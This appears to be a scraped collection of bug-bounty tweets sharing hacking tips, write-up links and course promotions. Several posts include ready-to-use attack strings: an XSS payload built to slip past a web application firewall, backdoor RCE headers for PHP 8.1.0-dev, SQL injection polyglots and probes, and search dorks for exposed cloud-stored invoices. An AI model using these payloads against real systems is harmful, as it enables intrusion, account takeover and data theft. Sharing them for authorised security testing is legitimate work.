Found SQL Injection to Account Takeover Manually :) 1. Enter mobile number to login intercept {"mobile_number":"8888888888"} >> 200 {"mobile_number":"8888888888'"} >> 500 {"mobile_number":"8888888888''"} >> 200 #bugbountytips

Dorking Clouds 🌩️ Have you thought of targeting Google Dorking techniques for cloud storage, CDNs, and more. Check out these 👇 Find Invoices site:*.s3.amazonaws.com -www Uber Invoice Breakdown: -Targets Amazon S3 buckets with Uber-related invoice files. -Excludes common

1 Bug, $50K+ in bounties: how Zendesk left a backdoor in hundreds of companies #bugbountytips gist.github.com/hackermondev/6…

If the WAF doesn't allow the creation of a JavaScript term like 'alert' or 'confirm' in any way, write it inverted and then use reverse() with self[]. Payload: <a%20href=%0dj&Tab;avascript&colon;x='trela'.split('').reverse().join('');self[x](origin)> #Bugbounty #AkamaiBypass

Slides of my talk in Security BSides Ahmedabad I hope you like it and found it a little bit useful docs.google.com/presentation/d… #bugbounty #bugbountytip #bugbountytips #infosec Thanks for support for all of you and Security BSides Ahmedabad & bugcrowd

Common vulnerabilities in Wordpress sites with severity for report #bugbounty. 1.Configuration File Leakage 2.Admin Username enumeration via REST API 3.Enable Xmlrpc.php 4.Vulnerable upload plugin #bugbountytip #hack #wordpress medium.com/@sriharanmahim…

If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); #bugbounty #bugbountytips #rce #sqli

getSubsidiaries:- Get list of subsidiaries for a selected company. This is useful for recon of wide scope bug bounty targets. github.com/xnl-h4ck3r/get…

JS0N Haddix Lupin PortSwigger That was it! We hope you've learned something new (and enjoyed) this thread! If you have enjoyed this thread: 1. Follow us Intigriti for more of these threads! 🐛 2. Retweet the first Tweet to share it with your friends 💙

🛑 How I turned a "Simple Search" feature into a Blind IDOR that exposed sensitive information for over 20k users in just 2 minutes! 🛑 Have you heard of a vulnerability called Blind IDOR? Sounds strange, right? Today, I’m going to talk about a vulnerability I discovered in one

As I promised, here is my writeup. RCE via Insecure JS Sandbox Bypass medium.com/@win3zz/rce-vi…

Day TWO of FIVE days of celebrating our 2 year ARCANUM-VERSARY! Arcanum Information Security 3rd Giveaway = FOUR seats to our new course by the_IDORminator "Zero to [BAC] Hero" ! 👍 1 Like = 1 Entry! ♻️ 1 Share = 2 Entries! Winners announced 1/21! Syllabus link below 👇

Active scanning+passive scanning You can go enjoy your coffee now #bugbounty #bugbountytips #0day #nday #CVE Burp Suite #exploit Google Antigravity

Great work Godfather Orwa 🇯🇴 This is a solid bypass. I recently wrote a write-up on a similar Stored XSS via PDF I found in Sep 2025: medium.com/@mrdesoky0/sto… Keep it up 🔥

404 page to RCE. A report by spaceraccoon | Eugene Lim He chained two old CVEs to achieve RCE: - Found a 404 page mentioning an obscure CMS, discovered /josso/signin login - Triggered CVE-2007-0450 (directory traversal in mod_proxy) using a %5C../ to bypass the internal proxy - Reached

A misconfigured “Login with Google” gave any Google user access to the admin console of an AI children’s toy, exposing every child’s conversations, family data, and remote device controls. Read more about this in Joseph Thacker's latest blog. Full write-up 👇 josephthacker.com/hacking/2026/0…

First SSRF 🔥💕

#SQL Injection Polyglots (Tested on MySQL & MariaDB) &1/*'/*"/**/||1#\ and-1/*'/*"/**/||1--+\ It performs injection on single and double quotes scenarios plus quoteless ones (where the injection lands in 2 consecutive points of the query). Use it in ALL input fields at once.

$4,500 in March isn’t much. Good thing is, April gives us another chance to go harder. Take some time and read about how a simple $500 Email verification bypass was escalated into a $1,500 because I kept expanding the impact through other reports. 🔗 medium.com/@tinopreter/fr…